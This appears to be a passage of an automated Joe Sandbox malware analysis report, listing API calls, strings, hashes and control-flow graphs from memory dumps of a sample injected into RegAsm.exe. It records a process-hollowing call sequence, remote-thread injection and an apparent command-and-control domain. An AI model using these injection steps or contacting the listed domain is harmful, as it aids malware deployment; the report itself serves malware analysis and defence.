                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C64190
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                              • String ID: bad locale name
                                                                                                                                              • API String ID: 3988782225-1405518554
                                                                                                                                              • Opcode ID: 8de93726e1db0ab7a75258fb5b63cf552d8fd0382aa7aef6a866201297643e46
                                                                                                                                              • Instruction ID: cef880e6a4d0f7a2c0bad05a337524f184ff0b5021233011f60968672a6aafd4
                                                                                                                                              • Opcode Fuzzy Hash: 8de93726e1db0ab7a75258fb5b63cf552d8fd0382aa7aef6a866201297643e46
                                                                                                                                              • Instruction Fuzzy Hash: CB118B70404B80AED320DF68C801757BBE4AF19714F008A5EE49A87B81D7B9A608CBA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C9DF0A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc
                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                              • API String ID: 190572456-1276376045
                                                                                                                                              • Opcode ID: 813192b8b1d16427ad6346712e8080e10a8256623eb739baff9a330d0a01d732
                                                                                                                                              • Instruction ID: e20f462427a46ab696d1feae326f0259e5a38529073596f2647ace192648f3c7
                                                                                                                                              • Opcode Fuzzy Hash: 813192b8b1d16427ad6346712e8080e10a8256623eb739baff9a330d0a01d732
                                                                                                                                              • Instruction Fuzzy Hash: 4A018472554756AFCB118F80DC09FBEB7B9FB04B50F000529E812E2290DB749A04CA60
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:41.9%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:15%
                                                                                                                                              Total number of Nodes:40
                                                                                                                                              Total number of Limit Nodes:1

                                                                                                                                              Callgraph

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02CE26B8
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02CE26CB
                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02CE26E9
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02CE270D
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02CE2738
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02CE2790
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02CE27DB
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02CE2819
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 02CE2855
                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 02CE2864
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.1849394239.0000000002CE2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CE2000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_2ce2000_oRkIPIEeryat7GMgjkBr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                              • String ID: GetP$Load$aryA$ress
                                                                                                                                              • API String ID: 2687962208-977067982
                                                                                                                                              • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction ID: cdcfbc631243b7b6c42388bc76dd9a32f96d7b279e4d518af497f94d1e7d9e19
                                                                                                                                              • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction Fuzzy Hash: 1DB1D67664024AAFDB60CF68CC80BDA77A9FF88714F158524EA0CEB341D774FA518B94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03CE3584,?,?,?), ref: 01160FC9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.1849169173.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_1160000_oRkIPIEeryat7GMgjkBr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 544645111-4108050209
                                                                                                                                              • Opcode ID: f9482c25f429c039ac0933aab2bd20941a630275386bec5fd4093bf855ce4a23
                                                                                                                                              • Instruction ID: 1fd9a57969e2cbbb590d7b10343f600ea94db3348f640734d366f1fe9540334e
                                                                                                                                              • Opcode Fuzzy Hash: f9482c25f429c039ac0933aab2bd20941a630275386bec5fd4093bf855ce4a23
                                                                                                                                              • Instruction Fuzzy Hash: AE129C309002558FCB0ACF69C480AADFFF5AF4E310F69C599E458AB266C731F991CB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 011610B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.1849169173.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_1160000_oRkIPIEeryat7GMgjkBr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: feecc7a73a3fe4051b1c39243376ec349292a5449179f562b38e1280a76128f1
                                                                                                                                              • Instruction ID: 6f89b1c3726dfd1cb55e8369a999eff12f2953a7e19c314396c131024bf54287
                                                                                                                                              • Opcode Fuzzy Hash: feecc7a73a3fe4051b1c39243376ec349292a5449179f562b38e1280a76128f1
                                                                                                                                              • Instruction Fuzzy Hash: E131F2B1900249EFCB14CFA9D984ADEBBF4FF48314F208029E958A7210D375A950CFA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 113 1160500-1161072 116 1161074-1161080 113->116 117 1161082-11610c1 CreateRemoteThread 113->117 116->117 118 11610c3-11610c9 117->118 119 11610ca-11610de 117->119 118->119
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 011610B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.1849169173.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_1160000_oRkIPIEeryat7GMgjkBr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 0499d15548f0de0872fc683b3db82e487f28742587ca4c17156c1ccc48a5df80
                                                                                                                                              • Instruction ID: addb1a5fe7b2a00f6c23e4a1ec58b60413bb538e0c04e0cc72c96fd74afc5b47
                                                                                                                                              • Opcode Fuzzy Hash: 0499d15548f0de0872fc683b3db82e487f28742587ca4c17156c1ccc48a5df80
                                                                                                                                              • Instruction Fuzzy Hash: C73104B5900249EFCF14CF99D984ADEBBF4FB48310F108029E919A7310D375A950CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 129 11604f4-1160fd6 VirtualProtect 132 1160fdf-1161000 129->132 133 1160fd8-1160fde 129->133 133->132
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03CE3584,?,?,?), ref: 01160FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.1849169173.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_1160000_oRkIPIEeryat7GMgjkBr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 0c8df6915ae22d7843f72d471a9061d5f414f7ad9e5e977487b13715d1d5a281
                                                                                                                                              • Instruction ID: 12e95e80e493fd2d375853e23984e049b4c7415a18514553651ecfb6d22225bb
                                                                                                                                              • Opcode Fuzzy Hash: 0c8df6915ae22d7843f72d471a9061d5f414f7ad9e5e977487b13715d1d5a281
                                                                                                                                              • Instruction Fuzzy Hash: 3A2115B1901219EFCB00CF9AC885BDEFBB8FB08310F10816AE918B7240D375A954CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:15.3%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:16.1%
                                                                                                                                              Total number of Nodes:311
                                                                                                                                              Total number of Limit Nodes:18

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: M.C$-Uk$@-t#$U=^3$e!}'$l9h?$m1w7$}%m;
                                                                                                                                              • API String ID: 0-2617895959
                                                                                                                                              • Opcode ID: 858b31ac3e56d838458b62c7e55d528acdb4f791de3a11f7d4d9e133cc0d2170
                                                                                                                                              • Instruction ID: 6a773ac881d51c05e7616f0b7475f283f1ec1e9526ef155ff2a7bcc4ebfbe97b
                                                                                                                                              • Opcode Fuzzy Hash: 858b31ac3e56d838458b62c7e55d528acdb4f791de3a11f7d4d9e133cc0d2170
                                                                                                                                              • Instruction Fuzzy Hash: F90259B5600B008BE328CF25D891B67B7E1FB89705F548A2DD5DA8BBA1EB74F405CB44
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: M.C$-Uk$@-t#$U=^3$e!}'$l9h?$m1w7$}%m;
                                                                                                                                              • API String ID: 0-2617895959
                                                                                                                                              • Opcode ID: 169af5ad51359e6c2a3cafa0f7d221ece67d597ccbb47c9164488c1cbe9f2b78
                                                                                                                                              • Instruction ID: 87eb36321ec09d9b3df0e99b7a0e046060a02d9914ae414ceb22da4e37e7cf2a
                                                                                                                                              • Opcode Fuzzy Hash: 169af5ad51359e6c2a3cafa0f7d221ece67d597ccbb47c9164488c1cbe9f2b78
                                                                                                                                              • Instruction Fuzzy Hash: 63F137B5200B00CBE328CF25D891B67B7E1FB49705F548A6DD5DA8BAA1EB74F441CB44
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: = 'Q$cfbe
                                                                                                                                              • API String ID: 0-911374196
                                                                                                                                              • Opcode ID: 6d61d4dcef794e29638592454722497267c9adfd5ffa75ec27e31235a934c28e
                                                                                                                                              • Instruction ID: bb3565213d9b5af794c0b6c16da6f42ae929365bcb1d7bd06dd9ed2123aaf00f
                                                                                                                                              • Opcode Fuzzy Hash: 6d61d4dcef794e29638592454722497267c9adfd5ffa75ec27e31235a934c28e
                                                                                                                                              • Instruction Fuzzy Hash: B8924970245B908EE726CB35D494BE3BBE1BF17344F84099DD4EB8B282C77AA405CB55
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0$Y!N#$b$j$tQpS
                                                                                                                                              • API String ID: 0-1561506603
                                                                                                                                              • Opcode ID: fbdca97d7b5b8bd9867f2ab60e92d600497daf09618555274c6545db3ae8f586
                                                                                                                                              • Instruction ID: 77bbfa77775ed737320afc19213c5ed02593b238c67c5d09a0c0deb4d33d9e09
                                                                                                                                              • Opcode Fuzzy Hash: fbdca97d7b5b8bd9867f2ab60e92d600497daf09618555274c6545db3ae8f586
                                                                                                                                              • Instruction Fuzzy Hash: 221212B02083819BE324CF15C4A4B5BBBE2BBC6308F545D2DE4D59B392D779D8098B96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph
                                                                                                                                              control_flow_graph 582 4384d6-43858a call 439a30 * 3 589 4385d4-4385d9 582->589 590 43858c-43858f 582->590 593 4385df 589->593 594 4383ad-438461 call 439a30 * 3 589->594 591 438590-4385d2 590->591 591->589 591->591 601 438463 594->601 602 4384b4-4384b9 LoadLibraryW 594->602 605 438470-4384b2 601->605 603 4384c0-4384d3 602->603 604 4384bb 602->604 604->603 605->602 605->605
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: D1B7$D1B7
                                                                                                                                              • API String ID: 0-2576811906
                                                                                                                                              • Opcode ID: 60bdf6df0d9da367abe9cafd864840737e1feb61e3c6acb89e3bd56984f3b0f9
                                                                                                                                              • Instruction ID: 227d40b3051d5b9f1c8533b328a387a81ecb6462684d2791c386ca89a2a782a0
                                                                                                                                              • Opcode Fuzzy Hash: 60bdf6df0d9da367abe9cafd864840737e1feb61e3c6acb89e3bd56984f3b0f9
                                                                                                                                              • Instruction Fuzzy Hash: BE516CB4518301ABD708DF10D9A172FBBE2BBCA708F04992CE48547351E7B88D05EB8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: v
                                                                                                                                              • API String ID: 0-1801730948
                                                                                                                                              • Opcode ID: 233739d0e7ffd3f581b2dd250cda54125e3c87964c33640d052a77960d3d9fd8
                                                                                                                                              • Instruction ID: c80b823732e71f4cdd7a44ad5e5a1a1d83ce3d0079143c9f8b25ab05eee7cb54
                                                                                                                                              • Opcode Fuzzy Hash: 233739d0e7ffd3f581b2dd250cda54125e3c87964c33640d052a77960d3d9fd8
                                                                                                                                              • Instruction Fuzzy Hash: 69E1DFB15083419FD324CF14C48179FBBE2AFD5308F588A6EE4998B392E739D845CB96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID: A\]D$vSUN
                                                                                                                                              • API String ID: 2994545307-3118794373
                                                                                                                                              • Opcode ID: ec616842d889afad07b2ab96f2a3b507bd2965400d8841d8a2506f832f9cda12
                                                                                                                                              • Instruction ID: 035f47e295922484c15501f127bff06197c6eb06fd4f10a441f5a1a71ebf76b5
                                                                                                                                              • Opcode Fuzzy Hash: ec616842d889afad07b2ab96f2a3b507bd2965400d8841d8a2506f832f9cda12
                                                                                                                                              • Instruction Fuzzy Hash: 58C1EEB1608361AFD710CF18D580B2BB7E1FB99318F54892EE5C497342D3B9D905CB9A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: s}$EBC
                                                                                                                                              • API String ID: 0-541026534
                                                                                                                                              • Opcode ID: fb2f0fbeb1042633251d49655d5c2928f3e20c5a302b4eecd125761bc4d1844e
                                                                                                                                              • Instruction ID: d7b96847a59d0831858f5b8d16e64329f0c99a4ad7ef32cd16afe207355252a1
                                                                                                                                              • Opcode Fuzzy Hash: fb2f0fbeb1042633251d49655d5c2928f3e20c5a302b4eecd125761bc4d1844e
                                                                                                                                              • Instruction Fuzzy Hash: AB91A5B06083518BD724CF14D89076BBBF1FF92358F548A1DE4A68B391E378D909CB96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00435B5D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: f21a35c5c3999f510f2e72610054c5e10ecc36b1628d5fe1b25180f555448144
                                                                                                                                              • Instruction ID: ed305ee78db003560d5c2f81a7b8d567382a75ce1c99dc0f9374550bddc06ea8
                                                                                                                                              • Opcode Fuzzy Hash: f21a35c5c3999f510f2e72610054c5e10ecc36b1628d5fe1b25180f555448144
                                                                                                                                              • Instruction Fuzzy Hash: 0611E2705083419FE708CF10D46476BFBA1EBC5318F108A1DE8A92B681C379D90ACB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • LdrInitializeThunk.NTDLL(0043A5F6,005C003F,00000006,00120089,?,00000018,gxyz,?,0041518F), ref: 00435B9D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                                                                                                              • Instruction ID: e4f63ef377a97c2914c676668e3278340bf37c640bd7ba7daadddd8153819c93
                                                                                                                                              • Opcode Fuzzy Hash: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                                                                                                              • Instruction Fuzzy Hash: 26E0B675509606EBDA05DF45C14051FF7E2BFC4714FA5C88DE88463204C7B4BD45DA42
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: gxyz
                                                                                                                                              • API String ID: 0-2474275795
                                                                                                                                              • Opcode ID: 7cd865df7580e3a3251fbc4e571994a29d3f672298f33b1a4ae226595439b4e2
                                                                                                                                              • Instruction ID: e7b234e54a7d762bb6a3bd1b4f03db8f12db98f9d7bb1013814233ca64f7ddf6
                                                                                                                                              • Opcode Fuzzy Hash: 7cd865df7580e3a3251fbc4e571994a29d3f672298f33b1a4ae226595439b4e2
                                                                                                                                              • Instruction Fuzzy Hash: F281CA72A043129BD714CF14C8A0B6BB3A1FF88364F25991EE9955B391D338EC15CB9A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID: gxyz
                                                                                                                                              • API String ID: 2994545307-2474275795
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 789:
                                                                                                                                              • API String ID: 0-2924019492
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 6 42a245-42a333 7 42a375-42a3dd SysAllocString 6->7 8 42a335 6->8 11 42a3e7-42a413 7->11 9 42a337-42a371 8->9 9->9 10 42a373 9->10 10->7
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocString
                                                                                                                                              • String ID: !$%$3$6$:$;$D
                                                                                                                                              • API String ID: 2525500382-2591950249
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 24 40dbf0-40dbfc 25 40dbfe-40dcd2 24->25 26 40db7f-40dbbe call 40a600 call 4359f0 call 40a470 call 435aa0 24->26 27 40dcd4 25->27 28 40dd1b-40ddcd 25->28 52 40dbc3-40dbeb 26->52 30 40dcd6-40dd17 27->30 31 40de0a-40e037 ExitProcess * 4 28->31 32 40ddcf 28->32 30->30 34 40dd19 30->34 36 40e074-40e0c6 31->36 37 40e039 31->37 35 40ddd1-40de06 32->35 34->28 35->35 39 40de08 35->39 41 40e0f2-40e14c call 40b320 36->41 42 40e0c8 36->42 40 40e03b-40e070 37->40 39->31 40->40 46 40e072 40->46 47 40e0ca-40e0ee 42->47 46->36 47->47 50 40e0f0 47->50 50->41
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: 8C$bordersoarmanusjuw.shop
                                                                                                                                              • API String ID: 621844428-3969398216
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 53 40d5d0-40d5d2 54 40d5d4-40d6df call 4092e0 53->54 55 40d59b-40d59f 53->55 58 40d6e1-40d6e4 54->58 59 40d728-40d7d4 54->59 55->53 62 40d6e6-40d721 58->62 60 40d7d6-40d7d9 59->60 61 40d817-40da4e ExitProcess * 4 59->61 64 40d7db-40d810 60->64 65 40da50-40da52 61->65 66 40da8f-40dae1 61->66 62->62 63 40d723-40d726 62->63 63->59 64->64 67 40d812-40d815 64->67 68 40da54-40da89 65->68 69 40dae3 66->69 70 40db19-40db44 call 40b320 66->70 67->61 68->68 71 40da8b-40da8d 68->71 72 40dae5-40db12 69->72 75 40db49-40db71 70->75 71->66 72->72 74 40db14-40db17 72->74 74->70
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: 8C$bordersoarmanusjuw.shop
                                                                                                                                              • API String ID: 621844428-3969398216
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
